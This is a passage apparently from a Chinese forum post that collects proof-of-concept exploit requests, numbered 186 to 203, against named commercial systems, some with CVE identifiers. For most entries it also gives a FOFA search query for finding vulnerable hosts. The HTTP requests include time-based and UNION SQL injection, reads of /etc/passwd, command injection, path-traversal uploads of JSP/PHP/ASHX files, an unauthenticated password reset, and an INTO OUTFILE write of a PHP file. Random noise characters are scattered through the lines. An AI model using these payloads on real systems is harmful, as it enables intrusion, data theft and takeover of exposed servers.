; G, Y: \3 z9 t0 |) { tGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1! ?1 O# G; l" v+ \, t- r% Z
Host: host
q# M |! Q7 H$ ?- z3 F
2 a q- p- m# [ c8 d! f' j
2 P4 W# V. P$ w- H5 i4 b186. F-logic DataCube3 SQL注入
; C, d5 e. F1 sCVE-2024-317509 B" T3 M; Y0 @4 y# U8 b6 y/ j9 L
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统& H+ ^4 R- B- A9 l
FOFA:title=="DataCube3"/ Q& C1 C! V+ ~/ v% k' r! H' |
POST /admin/pr_monitor/getting_index_data.php HTTP/1.16 M* e& h! J* C0 V6 R9 f
Host: your-ip
/ {3 }; p) R! X0 ?8 _5 A$ J9 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
6 X$ b. T/ e4 M* `4 O2 L/ IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 C0 L$ f1 s9 n2 C" a' Z% h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 `5 B: w; D5 x8 CAccept-Encoding: gzip, deflate
9 D8 @# }# i9 u! x3 t5 z" KConnection: close) {, h' r8 s+ z! g
Content-Type: application/x-www-form-urlencoded* H+ K0 l/ J+ ~ R$ E% p5 m |
- n% Z) q t% E
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
; n0 b1 R7 q5 c8 y0 q$ S# Q. p. W* F" L! g: k3 }# D
6 u b# }$ y% O* g
187. Mura CMS processAsyncObject SQL注入- H: x- u, e8 e5 p
CVE-2024-32640
# o6 N7 z% N3 R8 f6 QFOFA:"Mura CMS"4 x% |9 p A0 e3 ~# X4 j7 Q
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.16 N$ d" b/ O/ s" F7 I
Host: your-ip
6 ~* w1 t4 T# x# I uContent-Type: application/x-www-form-urlencoded
- `; b# i L8 x0 t+ u6 Q( l& N$ U; f, k
1 D! H1 N) |$ lobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=10 z2 G% b7 m0 i! S3 N# `
1 e1 Q( M2 N2 b. f* ?( t9 m
/ t: y% g- @* u4 I188. 叁体-佳会视频会议 attachment 任意文件读取" F( A8 b* G. O: K! X' _
version <= 3.9.7
' e2 G5 L' h, F+ \9 l9 ~$ x1 pFOFA:body="/system/get_rtc_user_defined_info?site_id"
; f: S1 i( a4 I s# \GET /attachment?file=/etc/passwd HTTP/1.1
4 t* f) o) X- F( t1 u& WHost: your-ip
" l7 l4 x, D) @5 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.361 E2 O1 Y: t' V- H, U0 u, Z$ F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 O0 B5 `7 }" ?/ ^8 V
Accept-Encoding: gzip, deflate9 E# t @4 r- C
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
$ Y( O4 i1 n/ ZConnection: close: Y' d" f3 s1 K' v! ^& @
6 b/ Z9 x) \4 _8 _, B- ~
_) ^' ?( ~9 N8 t+ u189. 蓝网科技临床浏览系统 deleteStudy SQL注入$ D. H7 @7 C/ A5 N K
FOFA:app="LANWON-临床浏览系统"& `% c* n0 f) S; c9 L% g3 A3 v
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1+ o" l8 A0 f( D+ j+ H9 ]
Host: your-ip
; A6 i0 N5 {$ l! a5 N4 i5 fUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36- j: b. g6 `3 n# w6 g, y8 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ ~5 E( T2 R0 i+ u/ Q4 N3 oAccept-Encoding: gzip, deflate# r3 M0 T0 A1 u( O
Accept-Language: zh-CN,zh;q=0.96 m- ]( n U" ^$ L _9 l2 e
Connection: close
! F8 ^' E6 g$ W) q* y: L7 Z+ H X3 j) v: S
6 U( I( i2 Z( Z
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
- p. M) X8 f6 zFOFA:title=="短视频矩阵营销系统"
2 y( E, f3 l& e) CPOST /index.php/admin/Userinfo/poihuoqu HTTP/25 h! W* B7 l. e# f0 c; S' H# u
Host: your-ip
' ~( I1 W! Y9 D0 T2 _: H! |6 N& EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
1 s0 g" j3 P0 _- i2 e; d9 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
& J9 l5 N* Z& pContent-Type: application/x-www-form-urlencoded
+ X4 p1 O2 H, P+ fAccept-Encoding: gzip, deflate3 v' F8 G9 ] G; I0 h
Accept-Language: zh-CN,zh;q=0.9) W4 ?. q3 `8 P8 \0 C) E4 R8 v
, c& y/ W: q( d& ~8 r: W! Tpoi=file:///etc/passwd
; X6 t( {% h9 U7 R
4 y2 x! G) h: o" w) H: w0 U" A' `- r' F* n2 ~% }
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
) k- z, @+ m/ ZFOFA:body="/CDGServer3/index.jsp"
* U9 `# v' _- [9 PPOST /CDGServer3/js/../NavigationAjax HTTP/1.17 p0 {! o' u0 @( {
Host: your-ip
8 f7 Z& u" M2 Z6 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) E$ B4 Z: u5 a; q
Content-Type: application/x-www-form-urlencoded
& Q3 p! D$ G8 s; A9 F" z+ O. V6 V* Q$ ^( z: N' a
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=1 w1 S" Q) M4 H& }6 g
) I3 V% j$ G, ?8 z# e/ s2 h, \, e+ |+ R6 M7 k
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
4 b' _9 t" R$ qFOFA:title="用户登录_富通天下外贸ERP"$ X5 m3 P' U0 w8 ^6 A: |
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
1 {) W ]3 [! r. |3 q* SHost: your-ip
+ {5 t% ?6 x! h9 U+ S+ fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.363 P, }+ g: N. ~$ [6 Q7 ` ]. r% J
Content-Type: application/x-www-form-urlencoded* [+ Y% A0 f% H5 @: {
9 I1 K& |& g" {
$ M) [ Z1 }4 z
<% @ webhandler language="C#" class="AverageHandler" %>; w3 l; x4 ]$ i8 h' q9 W! | V
using System;7 H. V0 \( L. u2 |
using System.Web; _# F3 F9 C# g& X# k
public class AverageHandler : IHttpHandler# S/ n" W1 \) n+ @) W
{
+ @% L! K0 P7 z$ y/ fpublic bool IsReusable
) K1 Q2 I* c& _: K4 l, U# i0 A+ G1 M{ get { return true; } }
+ g, ^+ a! ?8 q w3 O* r3 {$ D* F. Upublic void ProcessRequest(HttpContext ctx)
5 }3 X& \4 Z. h2 h{& I% `: p1 e7 M$ o: h
ctx.Response.Write("test");- g2 U/ h7 J5 t6 c
}9 F4 c. t6 I- U
}' a3 S, I3 n4 m( e5 _4 H1 q
( K* _. C0 O6 `: X% a. u: B6 l. G5 w
6 Q! n+ m" i. i& b/ F" b
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行: y% n; _0 ?+ [1 b4 O& ^1 x2 |
FOFA:body="山石云鉴主机安全管理系统"
2 ~8 Y# L4 n* Z- ~' [1 Z! kGET /master/ajaxActions/getTokenAction.php HTTP/1.1
! I: D7 G$ C" i g. dHost:
! s! m: w4 X7 Z3 a8 R9 w9 XCookie: PHPSESSID=2333333333333;
/ i: L, T' N- z- t1 eContent-Type: application/x-www-form-urlencoded
! S( a% O! L9 `$ W8 R7 E* p# e( RUser-Agent: Mozilla/5.06 t3 a1 L5 h( l9 X& u: K
/ [1 Y: i, x' n0 ]* e2 ?
9 \$ N! Z( y) ^8 G& `& T) V; S
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.11 y5 T% b' L; l, L2 T7 u2 e
Host:
/ g5 B: x' |7 ^3 m3 v3 }User-Agent: Mozilla/5.0
- O/ q( h- I6 eAccept-Encoding: gzip, deflate) k; n, q- I% o6 \
Accept: */*( |4 [) {: p+ L# P4 c
Connection: close
+ ]. I1 n5 d% ?! [9 p* l+ kCookie: PHPSESSID=2333333333333;
, J4 r, `( v$ M, N: sContent-Type: application/x-www-form-urlencoded9 f0 `2 v' `) q. b- K
Content-Length: 84
: S6 _7 h& b* F* \+ }. z- n. y% `( y4 n r
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
. p3 A+ ^- U" Z
' u- t! ^& L7 V1 A( ^5 q2 R3 e7 \
GET /master/img/config HTTP/1.1
7 Z; ?% ~, |# S# w' {, S( w$ ZHost:0 i; c, f6 F- G; E
User-Agent: Mozilla/5.0
! Z# n! r' d/ Z7 g6 T4 j" O: ^1 x& y* H2 p7 [# x, n
5 g2 A$ h4 v7 T" ]$ Y" x
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传6 P( Q: p# u6 `0 ~: f
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在6 K# e$ ]" Z8 O6 n- O2 M4 u
! K; |6 Y! l6 f5 `" ]7 h$ T6 d
POST /servlet/uploadAttachmentServlet HTTP/1.1
]" P; ?& w7 ^4 l' dHost: host& C; \2 z$ o9 ]/ s+ |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
; w5 p0 {/ @6 P6 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( H1 f2 C( u% N5 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& c$ E, b; r* `! Z6 `1 W
Accept-Encoding: gzip, deflate# Y5 Q1 r# _( [6 {) C z% w
Connection: close, c2 i( H. J" s! U& O
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk1 y! A. v; c( ^1 a
------WebKitFormBoundaryKNt0t4vBe8cX9rZk2 t; ~: R% F4 }: D
" }- `& M- k; w( W( B4 ~, I
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
; \& L4 [6 m5 O- @0 y, SContent-Type: text/plain
, t, ~$ _( i, O) R1 X5 G<% out.println("hello");%>
, U( U7 }6 C4 g6 O------WebKitFormBoundaryKNt0t4vBe8cX9rZk
- a; k. o0 C5 t$ w! S, |1 ?Content-Disposition: form-data; name="json"
6 `- T8 A' b8 T; s$ ~8 J {"iq":{"query":{"UpdateType":"mail"}}}
) E3 H3 G0 `* g( J; t/ f( P------WebKitFormBoundaryKNt0t4vBe8cX9rZk--: {: a0 K2 H" l T8 L- h5 ?
; |, o( K% u. O7 g. X; Y, j
3 q2 V. a( f2 c7 o$ t
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行, r( I$ S6 @) S) H0 a
FOFA:title=="飞鱼星企业级智能上网行为管理系统: o# t3 d, A3 a3 L: V8 Y, R
POST /send_order.cgi?parameter=operation HTTP/1.1
+ T7 G7 v4 l6 J Z" IHost: 127.0.0.17 F* H4 j$ e6 {, u6 H
Pragma: no-cache+ k! G% ?/ s( P3 s+ _- X
Cache-Control: no-cache
; o5 l/ c r' ]$ OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+ a) k# I' [/ s) u, }) G# I& C3 xAccept: */*/ r3 {# P: B& y4 O. m
Accept-Encoding: gzip, deflate
. i" R1 p$ Z- X5 r% c: _Accept-Language: zh-CN,zh;q=0.9# R( K: T- m- j" m, U" Z }
Connection: close
( m v( a1 Q* D! V: gContent-Type: application/x-www-form-urlencoded7 S$ e$ \/ x5 Y; U) f3 Q5 |
Content-Length: 68
8 h! P, D/ n/ s% f- u8 g6 q: b0 ~; d2 Q4 R$ h" o" L
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
- c7 l, ^- l2 ^$ X6 A2 I) M0 J% A; M* U& T
* G+ I! G/ _- b9 }% R$ m E
196. 河南省风速科技统一认证平台密码重置: D0 ~1 ~, H! [. X }8 p
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
8 l- x% g' F! ~. E* WPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
+ _/ U* w6 Y, ?+ V" sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36! Q5 j. D3 H& L% C0 ?
Content-Type: application/json;charset=UTF-8' z4 c: Z) Y- c# t* x) t( t9 Y
X-Requested-With: XMLHttpRequest
% O, n( y; U: H n* H4 RHost:
/ I+ P) K2 L+ W+ }* j% n$ KAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
2 `" H& s6 z7 B8 L5 x P _Content-Length: 45* f! o/ J6 k# {5 D
Connection: close6 I% \6 g, F6 C0 x4 B9 ` f1 w
5 X) K" F" C4 t
{"xgh":"test","newPass":"test666","email":""}
% ~' K j4 m6 _; y! l- U+ J" D9 _! }6 s% b
5 P. f+ r4 Y( v$ ]/ m
! h! b0 w" `% w197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
; r6 \1 Y6 H2 r5 K2 j9 a! JFOFA:app="浙大恩特客户资源管理系统"
6 ^3 Y: c" g+ Q- c6 z( jGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
1 ^0 t6 W" P( E9 `7 U4 pHost:. |; l, q$ I# T( n8 h- t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
3 x# T' e) E: J( z/ o ]) ]Accept-Encoding: gzip, deflate7 `4 U, U" \8 p5 D0 Y
Connection: close# @* H6 j! H6 q* P# e
8 z& m9 Y& e: y* K% J+ D6 \
* g$ _# i5 j: d, P4 I
9 G7 |- ^6 I: _3 @198. 阿里云盘 WebDAV 命令注入& J: X, `" B4 ~) ]
CVE-2024-29640+ c4 g9 q4 n; [; X
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
. ]- P( i4 q: SCookie: sysauth=41273cb2cffef0bb5d0653592624cf648 b( j" y* Q' S- w" C1 v7 [/ B
Accept: */*1 X+ t+ [9 S2 L7 A, E0 o$ N
Accept-Encoding: gzip, deflate
1 Q4 ?4 t5 `2 w" X) |# eAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
! {& \% u' }" u5 C9 N: gConnection: close- c' ^- ~9 z% d
4 F0 g. f! p V$ b1 Z9 h7 x4 ]" L! _' C/ B/ ~
199. cockpit系统assetsmanager_upload接口 文件上传
3 h2 t1 W1 N' V* Q' `* I
. l2 g! K6 L3 J& W+ ^( P1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
) u( K$ P5 n" B( }- ]9 SGET /auth/login?to=/ HTTP/1.1* L2 Z- r3 N6 F$ c: O
+ {0 E! d4 w9 @
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"5 |) q ?; H9 F% ^# g2 k
8 J5 _* B' ?; r/ p6 ?! g
2.使用刚才上一步获取到的jwt获取cookie:& e* o3 \- ~4 {" c$ }$ L/ p( @
( u- s) ]6 x3 u2 U zPOST /auth/check HTTP/1.1
2 Q+ w' ^* p7 ~3 Z0 j" g, WContent-Type: application/json! O' F: u* p0 l
5 B: [' f$ L' ~1 F8 S{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}3 r% g. r) g; l$ G4 S
& k/ h& ^2 n2 f( Z' _
响应:200,返回值:
! s1 ~0 b) M# z, Z' S5 wSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/2 ^1 S! k5 u6 Z3 `3 Q
Fofa:title="Authenticate Please!"
1 f/ s& |9 ?" g( E( LPOST /assetsmanager/upload HTTP/1.1& Q3 {8 f) i& A5 y
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3" g4 B$ M% j8 @/ Z
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
: z/ G4 n- I/ Z
( S4 k) V. u' X! U4 b4 a' g x-----------------------------36D28FBc36bd6feE7Fb3
: D! J2 c1 |: n! HContent-Disposition: form-data; name="files[]"; filename="tttt.php"/ x- }9 k6 U7 }, t! W V! J
Content-Type: text/php7 p5 n7 q2 z1 S9 Y* S4 E7 j% l
& Q( v5 z8 ~; u; |) T S$ ^7 K
<?php echo "tttt";unlink(__FILE__);?>% C! x |& ?5 M
-----------------------------36D28FBc36bd6feE7Fb3& e: S9 L; M2 E. x& y) D3 Z
Content-Disposition: form-data; name="folder"
" P. A! J2 r6 h8 |' B- U; R4 ~
% r' D* F" X. G5 ~! c-----------------------------36D28FBc36bd6feE7Fb3--
0 i9 x& P* d4 j/ M0 R$ J& J r5 y1 k$ y" J
( s/ N7 ^" o$ ^0 o
/storage/uploads/tttt.php
9 f( j" Z0 B4 e4 N! ~3 e0 V8 G* m' S7 U- d$ x
200. SeaCMS海洋影视管理系统dmku SQL注入
1 D2 E, `7 \* H, q' hFOFA:app="海洋CMS"
# A! `& h9 I8 h$ ZGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.19 s7 _; {+ J. B
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
5 b* y# X" f @" jUpgrade-Insecure-Requests: 1 O3 r- G7 w7 u2 W- [
Cache-Control: max-age=0. |9 L7 _& G; J) Q+ n, C; S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" l* s8 V/ {5 b' j4 m0 `5 W/ R gAccept-Encoding: gzip, deflate: ~3 ~' l# a: i
Accept-Language: zh-CN,zh;q=0.9& ~. A4 ]( r! o! Z$ ~
) z; ]6 U { k+ ?/ o- c0 R
+ q0 F, t2 W: @' ~- u5 _8 @
201. 方正全媒体新闻采编系统 binary SQL注入
. b3 Z. W( \& V' ]$ EFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"* s! _% e/ ` H3 w9 g- i) `$ V$ O
POST /newsedit/newsplan/task/binary.do HTTP/1.1
6 F! a/ Z8 C) sContent-Type: application/x-www-form-urlencoded# A6 q) x0 k# c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: }. O& f2 Y: }
Accept-Encoding: gzip, deflate% I0 o3 h* ]3 q# C( s, P
Accept-Language: zh-CN,zh;q=0.98 E: f& p6 _! }/ z: L$ R% T
Connection: close
2 y) V6 n9 p$ t3 @6 V9 p% Y
! J2 i( V0 }7 Q) T4 cTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
# C8 f& R$ @; [( e: f' f0 t: n
3 N+ |( s0 V: J
4 x3 F$ T- a8 w' B1 ~0 v202. 微擎系统 AccountEdit任意文件上传1 o, R; `# g8 p* j+ [( a/ L: G* H; M
FOFA:body="/Widgets/WidgetCollection/"
1 h/ p$ X' u. y获取__VIEWSTATE和__EVENTVALIDATION值
\& ?8 S. `5 R, _8 KGET /User/AccountEdit.aspx HTTP/1.11 O7 L/ Q. |( q3 |! W
Host: 滑板人之家/ R6 h- ^ c" m- C0 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.317 q- l, y1 [) ]( ?, Y/ H
Content-Length: 0. U7 c1 r' L( V% W7 R3 m! b
- J. \% K: s, n8 a; e# J- U; v4 x3 E7 s, f
替换__VIEWSTATE和__EVENTVALIDATION值
3 W1 i# ~/ y+ [% W1 YPOST /User/AccountEdit.aspx HTTP/1.1
9 r- I& h# ?$ L; I1 d2 F! ~+ x1 TAccept-Encoding: gzip, deflate, br: g( y Z" U$ `
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687" R3 q8 q W) X/ E# p6 l( ~
9 g5 D h. A" s# f1 B5 @: w/ f-----------------------------786435874t38587593865736587346567358735687) A( H; z2 `+ p; y+ t. f
Content-Disposition: form-data; name="__VIEWSTATE"
8 a2 @1 z3 S1 e0 _; {5 r8 d) j# g" H4 g& q- ]
__VIEWSTATE
9 D# E u4 Y/ B( ?& ]' U7 \-----------------------------786435874t38587593865736587346567358735687; m8 c: h k! K1 W2 o% f- _
Content-Disposition: form-data; name="__EVENTVALIDATION"
4 z# v; X- B% l C) q' Y- s
* q4 U. M3 C( ]: _! f__EVENTVALIDATION, j6 O9 Y+ h: F, e, v/ C
-----------------------------786435874t385875938657365873465673587356873 V9 X& ]0 e7 B" U A6 }
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
, \7 m6 m8 X! r% u8 o6 I( J wContent-Type: text/plain
; D5 T3 g' X, O9 a4 X
% u" ?( a# y* U+ w7 ?Hello World!2 [6 ?; g$ T2 n% y3 z3 n
-----------------------------786435874t38587593865736587346567358735687
; H8 k/ X8 V1 @8 T% _. }/ _Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"+ L: C6 H1 M3 @/ n$ ^5 M8 G) \! M
, X" ^; K8 ]3 d& R
上传图片
) S' P# p! [: G5 F! _( S-----------------------------786435874t38587593865736587346567358735687( W+ ]0 U. M! \: s; H; t
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
* U( T7 D' E L
; Y8 F5 N' \0 w L/ F1 f5 }' U7 |2 H
8 g" K" K; S% X4 G8 p* W-----------------------------786435874t38587593865736587346567358735687
; U7 c, @+ q1 }1 I& NContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"* R6 a1 G. Y3 p/ K
3 ]) `- l9 B: M2 A+ j' B* j! x
3 H5 P. V' k& L, b" c- k% \-----------------------------786435874t38587593865736587346567358735687--# _" A5 z1 u2 N2 @6 W
3 E, m0 E) p5 R5 {
9 T. ^. }9 m* I. ?6 S/_data/Uploads/1123.txt4 \/ |3 n9 x8 d% |' J! A% \3 ~8 ]
3 X3 ?! v( F" i& q* N, \9 w; T
203. 红海云EHR PtFjk 文件上传: U a! U5 A: O j) L& W# T3 z
FOFA:body="RedseaPlatform"
# ^! i" b5 c) x) ]POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.12 }/ s6 r5 O- Y8 U
Host: x.x.x.x
7 e# P. U1 e2 c( xAccept-Encoding: gzip `- w, N1 @0 W' d/ h/ d L" A: N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; e1 D# f# C. Q1 r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4$ y) e! }0 f1 l& u
Content-Length: 2101 O1 j- O# k* B0 L
+ k/ n0 W. B3 i0 `% q! g( q' g# z
------WebKitFormBoundaryt7WbDl1tXogoZys40 C g. I* p5 `+ W. p) x1 W9 z
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"6 I6 |( E" a4 X8 G
Content-Type:image/jpeg$ {- D8 E" g, ?, r! r
+ O' f [; g9 r1 @
<% out.print("hello,eHR");%>
% e* j, }! s+ S* `( W' _------WebKitFormBoundaryt7WbDl1tXogoZys4--
% L" N2 i6 ^6 ?" Q; }& o8 n% Q4 F
: C( p( H `% q, h8 {. _5 p, {
, P+ w' M- g6 {) N
2 W# p6 E8 @) `
: u- a+ O W$ @3 h$ h" X! C# }: l( g( N
|
发表于 2024-6-5 14:31:29
收藏
支持
反对